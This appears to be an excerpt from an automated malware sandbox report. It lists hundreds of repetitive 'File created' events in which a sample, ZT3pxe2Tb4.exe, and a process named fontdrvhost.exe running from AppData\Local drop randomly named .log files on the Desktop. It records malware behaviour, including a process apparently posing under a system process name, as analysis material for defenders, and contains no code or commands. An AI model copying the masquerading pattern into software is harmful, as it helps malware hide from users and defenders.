                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\VPWFywnw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pMKkuPam.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JvAHRkKP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XzKOkXsR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\VWGgLdif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YVGePHcW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DQsQlVoZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\lCADkPID.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HlvZPcYC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CTQIQVae.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GspafaHt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CdkYHFFH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RraOLYZw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TORFqFIZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TWBYVoif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zntiAIEO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dbVNVLdb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\maCuLVwe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RRcFiATg.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\THFECrua.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TlbPEPXm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rrvChBIx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GGiHtSpS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZbufrXkm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qguCdZEu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dabMNWxu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ouGCZwUD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DEcjsSrF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MTLhtkSf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\cixmEAyA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DdBAnNSZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\UOaorzbP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xgyKnYKq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\gmudUmpb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\PwAgeDiA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OnJqPAWm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QfCxRbIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NMMXsbef.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rmtKjMmm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MPlPWbPk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RMaOjKxV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\AFOsBjYP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OjpXkDnJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XEIwxBIS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MHvzAhUM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rAfUMkjC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\oQWKeSDj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WYfWtHNc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RCCOzYeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GPSaXBQY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iJlVzTXF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HxFJRUCD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ifAdEpGk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IHwzgXOR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\COTaDrJc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kdNuDPIk.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\pJXAdKPi.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xkYbKhNl.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xHZssejW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\phJkSByL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qiEMTywj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kMzdwiuP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\lHCvjEeO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\blWejAjG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XzFFzMmI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\NWMxEuQr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mCNvXUiC.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\XFfNnXVZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZklVGaxA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FWzHsBqG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OEWHVhjH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NgoGZspx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iANVPgEI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\xvPIrmGV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\nJvbxzCb.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tqrrAUxf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\PEqxAxdY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JAxqeOaQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OemrfNDp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TCIWpNeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IiRYzRio.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YUSxJEkf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zfzIrCEh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\SbqYhYfr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\SdGfOIqy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\LtTWIWgh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TYRgCYum.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aVjDvRpd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MMDorhKp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JfyqGcCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WgOpYqoh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KjbhtTTT.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kQZvTrxL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ylQifTUJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aFyNQRuY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sihlzJJp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WzsNMHNJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uHokLZDZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zReaumVj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kUpuTdpn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uvZrYWTP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\jECTfuuL.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\DnshUSLJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ULtOMFWU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iKNvbzqU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\msUTDNPI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\zsrQNmVQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uJzjHyIX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dKmMwLxf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fqGCEpSY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OzZYIDTF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FWXhQVXq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QpCXcuuA.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\SKewgrff.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sXAbZyyE.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\wHLAFYKX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sQxsIGwX.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\nHlSHaLn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fyqViYtd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sYhLnqXd.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\XxwvJouT.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KnZYovDz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zuGjoWSN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fvxnZIOH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\inpEUjnz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XsyMwKeS.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\dpYUmTzI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mJblSiJK.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OgxpbmIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rudcNvNr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\wsOrhbIJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hsmnhNDB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ORiFVhtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZtZwWUdP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CQeYyQPa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zzDSBAiP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ikDUDecv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WuogHSdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YOQFKOOU.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\DnshUSLJ.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tAOrkGQb.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\SKewgrff.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\IbKgwPay.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\zsrQNmVQ.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\pJXAdKPi.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\XxwvJouT.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\wHLAFYKX.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\lThKWNPp.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\dpYUmTzI.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tqrrAUxf.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tIxJOpqh.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\qxbJOXLg.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\avWEvUWS.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\RMCoLrQk.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\PCgnLZlk.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\xvPIrmGV.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\nHlSHaLn.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\XFfNnXVZ.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\NWMxEuQr.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\THFECrua.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\LtTWIWgh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MPlPWbPk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CgRzmzKC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kUpuTdpn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\blWejAjG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RCCOzYeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ylQifTUJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hezDLgou.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NMMXsbef.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uvZrYWTP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\cixmEAyA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KWVhlfdm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pzYaRqdW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YsHvxEyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\oTDkKMId.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KOmOGvDg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kdNuDPIk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\auteTnDC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RMaOjKxV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IiRYzRio.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WzsNMHNJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\gmudUmpb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KjbhtTTT.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CGTrJaEm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sXAbZyyE.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aLYWFcdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ORiFVhtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\phJkSByL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fyqViYtd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\VPWFywnw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NmOPODYO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fqGCEpSY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OjpXkDnJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ntFcgnCN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dKmMwLxf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\UbSwNisy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KszgdGmQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CQeYyQPa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\jECTfuuL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aVjDvRpd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RraOLYZw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zfzIrCEh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FWzHsBqG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pMKkuPam.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\feqUKmVF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WvXEaKPX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MMDorhKp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CdkYHFFH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mbeUnBPt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\cnAeDqUL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zntiAIEO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XsyMwKeS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xHZssejW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fvxnZIOH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TCIWpNeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DACRVJoK.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uRiBlhjd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RRcFiATg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\yEAAOeyR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\oQWKeSDj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YOQFKOOU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OgxpbmIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uJzjHyIX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\PEqxAxdY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FWXhQVXq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\wsOrhbIJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\nJvbxzCb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dabMNWxu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MTLhtkSf.logJump to dropped file
